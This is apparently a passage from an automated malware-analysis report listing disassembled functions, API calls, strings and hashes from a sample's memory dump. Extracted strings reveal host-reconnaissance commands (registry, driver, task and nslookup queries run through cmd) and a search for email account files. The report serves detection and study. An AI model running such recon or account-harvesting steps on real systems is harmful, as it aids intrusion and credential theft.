                                                                                                                                        • Instruction Fuzzy Hash: 0E118675600104BFEB11AF71DC88DAF376CEB88755B15092FFA02E2151EEF9C8458B6A
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00443FCC, Relevance: 9.1, APIs: 6, Instructions: 64memorystringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • lstrlen.KERNEL32(?), ref: 00443FE2
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000009), ref: 00443FF5
                                                                                                                                        • lstrcpy.KERNEL32(00000008,?), ref: 00444017
                                                                                                                                        • GetLastError.KERNEL32(004455EB,00000000,00000000), ref: 00444040
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000), ref: 00444058
                                                                                                                                        • CloseHandle.KERNEL32(00000000,004455EB,00000000,00000000), ref: 00444061
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$AllocateCloseErrorFreeHandleLastlstrcpylstrlen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2860611006-0
                                                                                                                                        • Opcode ID: 24c05f4931769e02d7e36d9e8765fe7aa30ae5413b1f80f67ed4b305ec26ecf7
                                                                                                                                        • Instruction ID: c97da9052ca06b1f89f63e1e6a8fb3225165780aeac279da94104f1cd4f3ffb4
                                                                                                                                        • Opcode Fuzzy Hash: 24c05f4931769e02d7e36d9e8765fe7aa30ae5413b1f80f67ed4b305ec26ecf7
                                                                                                                                        • Instruction Fuzzy Hash: D811B171500305EFEB109F65DC88AABBBB8FB403617114A3EF516C3250EB758D15CB6A
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 004606D4, Relevance: 9.1, APIs: 6, Instructions: 61stringthreadtimeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetTempPathA.KERNEL32(00000000,00000000,?,?,?,?,?,?,00453762,00000F00), ref: 004606E6
                                                                                                                                          • Part of subcall function 00458DE2: RtlAllocateHeap.NTDLL(00000000,?,00449CAD), ref: 00458DEE
                                                                                                                                        • GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,?,?,?,00453762,00000F00), ref: 004606FF
                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0046070C
                                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(00000F00,?,?,?,?,?,?,00453762,00000F00), ref: 00460718
                                                                                                                                        • GetTempFileNameA.KERNEL32(00000000,00000000,00000F00,00000000,?,?,?,?,?,?,00453762,00000F00), ref: 00460726
                                                                                                                                        • lstrcpy.KERNEL32(00000000), ref: 00460748
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Temp$FilePathTime$AllocateCurrentHeapNameSystemThreadlstrcpy
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1175089793-0
                                                                                                                                        • Opcode ID: a257d5a73ce356d9de82d5b32fefa7e611dbecad235fc62a2a8a130b4c0d6b86
                                                                                                                                        • Instruction ID: 0ea2ebffd594429196bfabb1e702e1e1fff5b92bb770db8f14f4d5aef6eb8e12
                                                                                                                                        • Opcode Fuzzy Hash: a257d5a73ce356d9de82d5b32fefa7e611dbecad235fc62a2a8a130b4c0d6b86
                                                                                                                                        • Instruction Fuzzy Hash: 07018C725001156BD7115B669C48DAB37ACDF81745705052AFA05E3201FFB4FC058BBE
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00446573, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 207COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLastmemset
                                                                                                                                        • String ID: vids
                                                                                                                                        • API String ID: 3276359510-3767230166
                                                                                                                                        • Opcode ID: b19ef3502a9f686fc35f999bb9be9355934ffbfc781e869b64237e3db000aeea
                                                                                                                                        • Instruction ID: c05c776b540a8a37af267d94cb56bad7dc00cfa32aa0998cf40ddc2b416e30f9
                                                                                                                                        • Opcode Fuzzy Hash: b19ef3502a9f686fc35f999bb9be9355934ffbfc781e869b64237e3db000aeea
                                                                                                                                        • Instruction Fuzzy Hash: 488137B1D002299FDB20DFA5C98099EBBB8FF09704F11816BF805A7251D7789A45CFA5
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00442916, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 137COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0045DBB2: lstrlen.KERNEL32(?,?,?,?,00442927,?), ref: 0045DBBB
                                                                                                                                          • Part of subcall function 0045DBB2: mbstowcs.NTDLL ref: 0045DBE2
                                                                                                                                          • Part of subcall function 0045DBB2: memset.NTDLL ref: 0045DBF4
                                                                                                                                        • GetVersion.KERNEL32(?), ref: 00442933
                                                                                                                                        • GetLastError.KERNEL32(?), ref: 00442A8F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLastVersionlstrlenmbstowcsmemset
                                                                                                                                        • String ID: !mF$+mF$?mF
                                                                                                                                        • API String ID: 4097109750-969985946
                                                                                                                                        • Opcode ID: 8a35173dc37f62cf5cbbeafd5b7ad6b24e98ebe00c7564790a5bfb51fc498ae9
                                                                                                                                        • Instruction ID: 5131c015e16620704e0f95731a1f1d49add90d9e3cb3cf981e1f2af3895d1632
                                                                                                                                        • Opcode Fuzzy Hash: 8a35173dc37f62cf5cbbeafd5b7ad6b24e98ebe00c7564790a5bfb51fc498ae9
                                                                                                                                        • Instruction Fuzzy Hash: 7A4161B1600206AFFB30DFA1DD45AAB3BA8EF04740F40452AFA41D6150E7B4EE44CB69
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0046103D, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 110COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • memset.NTDLL ref: 004610E8
                                                                                                                                        • FlushFileBuffers.KERNEL32(00000000,?,00000000,00000000), ref: 0046114F
                                                                                                                                        • GetLastError.KERNEL32(?,00000000,00000000), ref: 00461159
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: BuffersErrorFileFlushLastmemset
                                                                                                                                        • String ID: K$P
                                                                                                                                        • API String ID: 3817869962-420285281
                                                                                                                                        • Opcode ID: 8b1bb919600eb1b7d1f0b40d33f291534dc821935d261a743b23a485de8fc184
                                                                                                                                        • Instruction ID: 3f2add002db807d590961badd591a158512c84aa5e4b9715f18d019f8ffc59a6
                                                                                                                                        • Opcode Fuzzy Hash: 8b1bb919600eb1b7d1f0b40d33f291534dc821935d261a743b23a485de8fc184
                                                                                                                                        • Instruction Fuzzy Hash: FC419231A007459FDB24CFA4C9846AFBBF1BF19704F18892ED58693750F738A904CB56
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0045F1EA, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 102memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0045B39A: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000100,?,00000000), ref: 0045B3A8
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?), ref: 0045F24B
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0045F29A
                                                                                                                                          • Part of subcall function 0044178F: CreateFileW.KERNEL32(?,C0000000,?,00000000,?,00000080,00000000), ref: 004417D0
                                                                                                                                          • Part of subcall function 0044178F: GetLastError.KERNEL32 ref: 004417DA
                                                                                                                                          • Part of subcall function 0044178F: WaitForSingleObject.KERNEL32(000000C8), ref: 004417FF
                                                                                                                                          • Part of subcall function 0044178F: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00441820
                                                                                                                                          • Part of subcall function 0044178F: SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00441848
                                                                                                                                          • Part of subcall function 0044178F: WriteFile.KERNEL32(?,00001388,?,00000002,00000000), ref: 0044185D
                                                                                                                                          • Part of subcall function 0044178F: SetEndOfFile.KERNEL32(?), ref: 0044186A
                                                                                                                                          • Part of subcall function 0044178F: CloseHandle.KERNEL32(?), ref: 00441882
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,?,?,?,00461792,?,?,?,?,?,00000000,?,00000000,?,00459362), ref: 0045F2CF
                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,00461792,?,?,?,?,?,00000000,?,00000000,?,00459362), ref: 0045F2DF
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$Heap$AllocateCreateFreeTime$CloseErrorHandleLastObjectPointerSingleSystemWaitWrite
                                                                                                                                        • String ID: https://
                                                                                                                                        • API String ID: 4200334623-4275131719
                                                                                                                                        • Opcode ID: c458ee829cec9bdaca956a78bba2728483c98f890e0b026417ea2d8ac1b56d52
                                                                                                                                        • Instruction ID: a529bb9eb41209f8c02757da273ab665420b8bdea68067e71aed947696755f88
                                                                                                                                        • Opcode Fuzzy Hash: c458ee829cec9bdaca956a78bba2728483c98f890e0b026417ea2d8ac1b56d52
                                                                                                                                        • Instruction Fuzzy Hash: 3C3169B5A10119FFEB009F94CC89CAEBB7DFB08350B100469F905D3260EBB1AE55DBA5
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00452EAF, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83memoryregistryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00452F08
                                                                                                                                        • memcpy.NTDLL(00000018,?,?), ref: 00452F31
                                                                                                                                        • RegisterWaitForSingleObject.KERNEL32(00000010,?,Function_0000FD5F,00000000,000000FF,00000008), ref: 00452F70
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000), ref: 00452F83
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$AllocateFreeObjectRegisterSingleWaitmemcpy
                                                                                                                                        • String ID: ]hF
                                                                                                                                        • API String ID: 2780211928-2847826427
                                                                                                                                        • Opcode ID: e23118ad13a7c72592cb5058b773502cc5f4fc78ec81f6dd0e94ff72048fef6f
                                                                                                                                        • Instruction ID: 577cd01bc7243b9aba2e02697c02cef90bfe5b214846a77fa51c130db83fae3e
                                                                                                                                        • Opcode Fuzzy Hash: e23118ad13a7c72592cb5058b773502cc5f4fc78ec81f6dd0e94ff72048fef6f
                                                                                                                                        • Instruction Fuzzy Hash: 2F319371600205AFDB208F15EC44B9B7BB8FF15321F00452AF816C63A0E7B4DC15DBA5
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00457266, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80memorystringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00448CBF: memcpy.NTDLL(00000000,00000090,?,?,00000000,00000000), ref: 00448CFB
                                                                                                                                          • Part of subcall function 00448CBF: memset.NTDLL ref: 00448D77
                                                                                                                                          • Part of subcall function 00448CBF: memset.NTDLL ref: 00448D8C
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 004572BA
                                                                                                                                        • lstrcmpi.KERNEL32(00000000,Main), ref: 004572DA
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0045731F
                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,00000000,00000000), ref: 00457330
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$Freememset$Allocatelstrcmpimemcpy
                                                                                                                                        • String ID: Main
                                                                                                                                        • API String ID: 1065503980-521822810
                                                                                                                                        • Opcode ID: 972a8bcda193331ffd3a0cdf3feda712d241d695c3f03c1f69a5f4ce7d30c6cb
                                                                                                                                        • Instruction ID: 930ccc8cae34110e46fd4542f8682b95673116b09274946a617ae167cc67e5df
                                                                                                                                        • Opcode Fuzzy Hash: 972a8bcda193331ffd3a0cdf3feda712d241d695c3f03c1f69a5f4ce7d30c6cb
                                                                                                                                        • Instruction Fuzzy Hash: 9E219131A00205FBDF109FA1EC45E9E7B79EF04319F00447AFD05A6162EB789E59DB19
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00450B1C, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 79libraryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleA.KERNEL32(NTDLL.DLL,00000001,77E49EB0,00000000,?,?,?,?,00000000,004423A2), ref: 00450B2D
                                                                                                                                        • LoadLibraryA.KERNEL32(NTDSAPI.DLL), ref: 00450BC7
                                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00450BD2
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Library$FreeHandleLoadModule
                                                                                                                                        • String ID: NTDLL.DLL$NTDSAPI.DLL
                                                                                                                                        • API String ID: 2140536961-3558519346
                                                                                                                                        • Opcode ID: 8243a03721c8e2ab0392b70ac0ebb7940c60a26f00d9f15d9fb8496cf73396df
                                                                                                                                        • Instruction ID: ea88723a65c61f94bfc754e717ac0001043e2c40c5201570a576b54c6ab13951
                                                                                                                                        • Opcode Fuzzy Hash: 8243a03721c8e2ab0392b70ac0ebb7940c60a26f00d9f15d9fb8496cf73396df
                                                                                                                                        • Instruction Fuzzy Hash: 3D316BB59043028FD714CF68C484B6BB7E0FB9431AF14496EE88587352E774E94DCB9A
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0044FC34, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 74threadCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00446B8D: GetTickCount.KERNEL32 ref: 00446BA3
                                                                                                                                          • Part of subcall function 00446B8D: wsprintfA.USER32 ref: 00446BE4
                                                                                                                                          • Part of subcall function 00446B8D: GetModuleHandleA.KERNEL32(00000000), ref: 00446BF6
                                                                                                                                        • GetModuleHandleA.KERNEL32(00000000,?), ref: 0044FC5B
                                                                                                                                        • GetLastError.KERNEL32 ref: 0044FC75
                                                                                                                                        • RtlExitUserThread.NTDLL(?), ref: 0044FC8F
                                                                                                                                        • GetLastError.KERNEL32 ref: 0044FCCF
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorHandleLastModule$CountExitThreadTickUserwsprintf
                                                                                                                                        • String ID: iF
                                                                                                                                        • API String ID: 1798890819-3484524759
                                                                                                                                        • Opcode ID: f0be38e2cc482e6dd7f18b68a5833faf58302323093061194cda9fd744d05164
                                                                                                                                        • Instruction ID: d99c54cd816606fcb5a49cc287cf8eafd5ab3f67a588ab65f027c50b1d7694f0
                                                                                                                                        • Opcode Fuzzy Hash: f0be38e2cc482e6dd7f18b68a5833faf58302323093061194cda9fd744d05164
                                                                                                                                        • Instruction Fuzzy Hash: 6B118171504249AFE7109F25DD88C7B7BBCFE867507040A2EF952C2150EB649C09CB3B
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0045DC04, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • lstrlen.KERNEL32(00000000,?,00000008,?,?,?,0044B7D1,?,?), ref: 0045DC18
                                                                                                                                          • Part of subcall function 00458DE2: RtlAllocateHeap.NTDLL(00000000,?,00449CAD), ref: 00458DEE
                                                                                                                                        • mbstowcs.NTDLL ref: 0045DC34
                                                                                                                                        • lstrlen.KERNEL32(account{*}.oeaccount), ref: 0045DC42
                                                                                                                                        • mbstowcs.NTDLL ref: 0045DC5A
                                                                                                                                          • Part of subcall function 00456E86: lstrlenW.KERNEL32(?,00000000,74B069A0,?,00000250,?,00000000), ref: 00456ED2
                                                                                                                                          • Part of subcall function 00456E86: lstrlenW.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0044606A), ref: 00456EDE
                                                                                                                                          • Part of subcall function 00456E86: memset.NTDLL ref: 00456F26
                                                                                                                                          • Part of subcall function 00456E86: FindFirstFileW.KERNEL32(00000000,00000000), ref: 00456F41
                                                                                                                                          • Part of subcall function 00456E86: lstrlenW.KERNEL32(0000002C), ref: 00456F79
                                                                                                                                          • Part of subcall function 00456E86: lstrlenW.KERNEL32(?), ref: 00456F81
                                                                                                                                          • Part of subcall function 00456E86: memset.NTDLL ref: 00456FA4
                                                                                                                                          • Part of subcall function 00456E86: wcscpy.NTDLL ref: 00456FB6
                                                                                                                                          • Part of subcall function 0044EB0A: RtlFreeHeap.NTDLL(00000000,00000000,00456D9D,00000000), ref: 0044EB16
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen$Heapmbstowcsmemset$AllocateFileFindFirstFreewcscpy
                                                                                                                                        • String ID: account{*}.oeaccount
                                                                                                                                        • API String ID: 1961997177-4234512180
                                                                                                                                        • Opcode ID: 73a52570dfaea2eee4db5a2a5c28169c2622981eb02861072c7fbe0956162374
                                                                                                                                        • Instruction ID: 4968a2e9aae9b1a5bdabce0e4f4955a6706a930ef6b6de990f4a9228392d401c
                                                                                                                                        • Opcode Fuzzy Hash: 73a52570dfaea2eee4db5a2a5c28169c2622981eb02861072c7fbe0956162374
                                                                                                                                        • Instruction Fuzzy Hash: 95018872D00204B6DB21ABA68C46F9F7BBCFF45355F14412AB905A3152EA79D908C664
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 004432CA, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 52memorystringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00010000), ref: 004432E6
                                                                                                                                        • lstrlen.KERNEL32(EMPTY,00000008,00000000,0000010E,00000000,?), ref: 0044331A
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,EMPTY,00000000), ref: 00443336
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$AllocateFreelstrlen
                                                                                                                                        • String ID: EMPTY$log
                                                                                                                                        • API String ID: 3886119090-141014656
                                                                                                                                        • Opcode ID: b4d4927905294cb22629f153efb7936057f28b34b41f6afe524cd511f38b0741
                                                                                                                                        • Instruction ID: b56edb3ba6d2525a41bb8f45cb1fdc1832b88d78de1b8f8b83b0dc18fb5cce6f
                                                                                                                                        • Opcode Fuzzy Hash: b4d4927905294cb22629f153efb7936057f28b34b41f6afe524cd511f38b0741
                                                                                                                                        • Instruction Fuzzy Hash: 4101F971A00254BBDB219F969C4CD9B7B6CDB85B52B100437F901D2111EAB54E44D67A
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00459038, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49libraryloaderCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetVersion.KERNEL32(0046E220,0045D680), ref: 0045903C
                                                                                                                                        • GetModuleHandleA.KERNEL32(NTDLL.DLL,LdrRegisterDllNotification), ref: 00459050
                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00459057
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressHandleModuleProcVersion
                                                                                                                                        • String ID: LdrRegisterDllNotification$NTDLL.DLL
                                                                                                                                        • API String ID: 3310240892-3368964806
                                                                                                                                        • Opcode ID: d52d849f36cba69b7e8c1f06e5522154db69a1c7e12ed2251b736777cd734197
                                                                                                                                        • Instruction ID: a426e5283d56c12843078da8e71e5f3fed3834735488e16da53e4673720d696c
                                                                                                                                        • Opcode Fuzzy Hash: d52d849f36cba69b7e8c1f06e5522154db69a1c7e12ed2251b736777cd734197
                                                                                                                                        • Instruction Fuzzy Hash: D5018870200301DFD7509F758C487467BE5AB46705F14C47ED944C72A3EBB8C8498B1E
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 004445CD, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49sleepCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(0046E268), ref: 004445D8
                                                                                                                                        • Sleep.KERNEL32(0000000A), ref: 004445E2
                                                                                                                                        • SetEvent.KERNEL32 ref: 00444639
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(0046E268), ref: 00444658
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$EnterEventLeaveSleep
                                                                                                                                        • String ID: 0dF
                                                                                                                                        • API String ID: 1925615494-1157920388
                                                                                                                                        • Opcode ID: 2893d74a66a5d22f1b8f6c31e4d664905ce0e8553a7b4e6feabeb439d27d873c
                                                                                                                                        • Instruction ID: dc7dfa7134daa9fa464412ff5bd9aa4abb7cc8877f8d703b65700c284b0ae6c3
                                                                                                                                        • Opcode Fuzzy Hash: 2893d74a66a5d22f1b8f6c31e4d664905ce0e8553a7b4e6feabeb439d27d873c
                                                                                                                                        • Instruction Fuzzy Hash: 79015EB4A40214BBFB10AB62EC05B6A3BACEB15701F104437F605D6190FBF99A04DA9F
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0046386B, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 45libraryloaderCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetVersion.KERNEL32(?,00000000,74B5F720,?,0044AB61,00000000,?,?,?,00445505), ref: 0046388F
                                                                                                                                        • GetModuleHandleA.KERNEL32(NTDLL.DLL,LdrUnregisterDllNotification,?,0044AB61,00000000,?,?,?,00445505), ref: 004638A3
                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 004638AA
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressHandleModuleProcVersion
                                                                                                                                        • String ID: LdrUnregisterDllNotification$NTDLL.DLL
                                                                                                                                        • API String ID: 3310240892-3940208311
                                                                                                                                        • Opcode ID: 57c0a1a0e2e9379145cc75e8670c9bdc4c63164736bea7892f3615d405deeec4
                                                                                                                                        • Instruction ID: 5810e0595268a38d5940a9623df1dd9a5a6f5ea2f3a0a003bbb72a65d851e00f
                                                                                                                                        • Opcode Fuzzy Hash: 57c0a1a0e2e9379145cc75e8670c9bdc4c63164736bea7892f3615d405deeec4
                                                                                                                                        • Instruction Fuzzy Hash: 33018F752002009FD710AF6AEC88A96B7EDFB4A301315886FF14687321EB79FD01CB5A
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00446084, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39memorystringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • InterlockedExchange.KERNEL32(0046DF60,00000000), ref: 00446090
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 004460AB
                                                                                                                                        • lstrcpy.KERNEL32(00000000,-01), ref: 004460CC
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 004460ED
                                                                                                                                          • Part of subcall function 0044A704: SetEvent.KERNEL32(?,00461363), ref: 0044A718
                                                                                                                                          • Part of subcall function 0044A704: WaitForSingleObject.KERNEL32(000000FF,000000FF,?), ref: 0044A732
                                                                                                                                          • Part of subcall function 0044A704: CloseHandle.KERNEL32(00000000), ref: 0044A73B
                                                                                                                                          • Part of subcall function 0044A704: CloseHandle.KERNEL32(?,?), ref: 0044A749
                                                                                                                                          • Part of subcall function 0044A704: RtlEnterCriticalSection.NTDLL(?), ref: 0044A755
                                                                                                                                          • Part of subcall function 0044A704: RtlLeaveCriticalSection.NTDLL(?), ref: 0044A77E
                                                                                                                                          • Part of subcall function 0044A704: CloseHandle.KERNEL32(?), ref: 0044A79A
                                                                                                                                          • Part of subcall function 0044A704: LocalFree.KERNEL32(?), ref: 0044A7A8
                                                                                                                                          • Part of subcall function 0044A704: RtlDeleteCriticalSection.NTDLL(?), ref: 0044A7B2
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseCriticalHandleSection$FreeHeap$AllocateDeleteEnterEventExchangeInterlockedLeaveLocalObjectSingleWaitlstrcpy
                                                                                                                                        • String ID: -01
                                                                                                                                        • API String ID: 1103286547-1095514728
                                                                                                                                        • Opcode ID: 56a1f166d4037e5321b9b8d601ef3a3d829ffec0a8b2b083be5272d084227312
                                                                                                                                        • Instruction ID: bafa4dfcf5190cec33c52bf284a41e3d3f1374af707af49324d0b64bb2146687
                                                                                                                                        • Opcode Fuzzy Hash: 56a1f166d4037e5321b9b8d601ef3a3d829ffec0a8b2b083be5272d084227312
                                                                                                                                        • Instruction Fuzzy Hash: BCF01231F8035077D6311766AC0AF0B2A55EB59B61F150536F605A62E1EDA88848C6AF
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 004621A3, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 36memorystringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • lstrlen.KERNEL32(00000000,00000000,00000000,00446D43,reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >,00000000,?,driverquery.exe >,00000000,?,tasklist.exe /SVC >,00000000,?,nslookup 127.0.0.1 >,00000000), ref: 004621A8
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 004621BD
                                                                                                                                        • wsprintfA.USER32 ref: 004621D2
                                                                                                                                          • Part of subcall function 0045E99C: memset.NTDLL ref: 0045E9B1
                                                                                                                                          • Part of subcall function 0045E99C: lstrlenW.KERNEL32(00000000,00000000,00000000,77E5DBB0,00000000,cmd /C "%s> %s1"), ref: 0045E9EA
                                                                                                                                          • Part of subcall function 0045E99C: wcstombs.NTDLL ref: 0045E9F4
